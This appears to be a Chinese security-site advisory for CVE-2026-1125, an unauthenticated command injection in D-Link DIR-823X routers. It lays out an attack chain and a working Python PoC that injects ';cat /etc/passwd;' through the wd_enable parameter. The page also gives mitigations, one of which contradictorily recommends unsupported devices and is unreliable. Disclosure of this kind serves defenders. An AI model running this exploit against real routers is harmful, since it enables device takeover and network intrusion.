CVE-2026-1125 CVSS 7.3 高危

CVE-2026-1125 D-Link DIR-823X 命令注入漏洞

披露日期: 2026-01-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1125

漏洞类型

命令注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR-823X (固件版本 250416)

漏洞概述

CVE-2026-1125 是 D-Link DIR-823X 路由器中存在的一个高危命令注入漏洞。该漏洞位于 /goform/set_wifidog_settings 接口的 sub_412E7C 函数中，攻击者可以通过操控 wd_enable 参数在受影响的设备上执行任意系统命令。由于该漏洞无需认证即可利用，且已存在公开的漏洞利用代码，因此具有极高的安全风险。攻击者可以利用此漏洞完全控制路由器设备，进行网络嗅探、中间人攻击或进一步渗透内网。CVSS 3.1 评分为 7.3，属于高危漏洞。

技术细节

D-Link DIR-823X 路由器在处理 /goform/set_wifidog_settings 请求时存在命令注入漏洞。漏洞函数 sub_412E7C 直接将用户可控的 wd_enable 参数拼接到系统命令中执行，未进行充分的输入过滤和参数校验。攻击者可通过构造恶意参数值（如使用分号或管道符注入额外命令）在路由器上执行任意系统命令。由于该接口无需认证即可访问，攻击者可以直接通过 HTTP 请求远程利用此漏洞。成功利用后，攻击者可以获取设备的 root 权限，执行任意系统操作，包括修改防火墙规则、植入后门或窃取网络流量。

攻击链分析

STEP 1

步骤1

攻击者发现目标路由器 D-Link DIR-823X 的 /goform/set_wifidog_settings 接口

STEP 2

步骤2

攻击者构造恶意 wd_enable 参数，使用分号或管道符注入系统命令

STEP 3

步骤3

发送携带恶意参数的 HTTP POST 请求到目标设备

STEP 4

步骤4

路由器执行注入的命令，攻击者获取命令执行结果

STEP 5

步骤5

攻击者利用命令执行权限获取 root 权限，植入后门或进一步渗透内网

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-1125 PoC - D-Link DIR-823X Command Injection
# Target: D-Link DIR-823X router with firmware 250416
# Vulnerability: Command injection in /goform/set_wifidog_settings

target_ip = "192.168.0.1"  # Default router IP
target_url = f"http://{target_ip}/goform/set_wifidog_settings"

# Malicious payload to execute command (e.g., cat /etc/passwd)
# Using semicolon to inject command
payload = ";cat /etc/passwd;"

data = {
    "wd_enable": payload
}

try:
    response = requests.post(target_url, data=data, timeout=10)
    print(f"Status: {response.status_code}")
    print(f"Response: {response.text}")
except Exception as e:
    print(f"Error: {e}")

影响范围

D-Link DIR-823X 固件版本 250416

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 关闭路由器的 WiFiDog 功能；2) 限制对路由器管理界面的访问，仅允许受信任的 IP 地址访问；3) 使用防火墙规则阻止外部网络对路由器 80/443 端口的访问；4) 监控路由器日志，关注异常的 HTTP 请求；5) 考虑更换为已停止支持但无法获得安全更新的设备。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1125
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1125
3 Details https://www.cvedetails.com/cve/CVE-2026-1125/
4 VulDB https://vuldb.com/cve/CVE-2026-1125
5 Link https://github.com/DavCloudz/cve/blob/main/D-link/DIR_823X/DIR-823X%20V250416%20Command%20Execution%20Vulnerability.md
6 Link https://vuldb.com/?ctiid.341717
7 Link https://vuldb.com/?id.341717
8 Link https://vuldb.com/?submit.734966
9 Link https://vuldb.com/?submit.743503
10 Link https://www.dlink.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表